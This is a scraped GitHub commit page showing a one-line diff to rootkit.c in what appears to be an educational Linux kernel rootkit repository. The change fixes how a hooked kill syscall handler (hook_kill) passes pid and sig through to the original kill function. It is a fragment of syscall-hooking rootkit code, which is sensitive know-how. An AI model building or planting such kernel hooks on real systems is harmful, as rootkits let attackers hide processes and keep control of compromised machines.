We read every piece of feedback, and take your input very seriously.
To see all available qualifiers, see our documentation.
1 parent 2748306 commit ea7e55dCopy full SHA for ea7e55d
3_RootkitTechniques/3.2_kill_signalling/rootkit.c
@@ -84,7 +84,7 @@ static asmlinkage int hook_kill(pid_t pid, int sig)
84
}
85
else
86
{
87
- return orig_kill(regs);
+ return orig_kill(pid, sig);
88
89
90
#endif
0 commit comments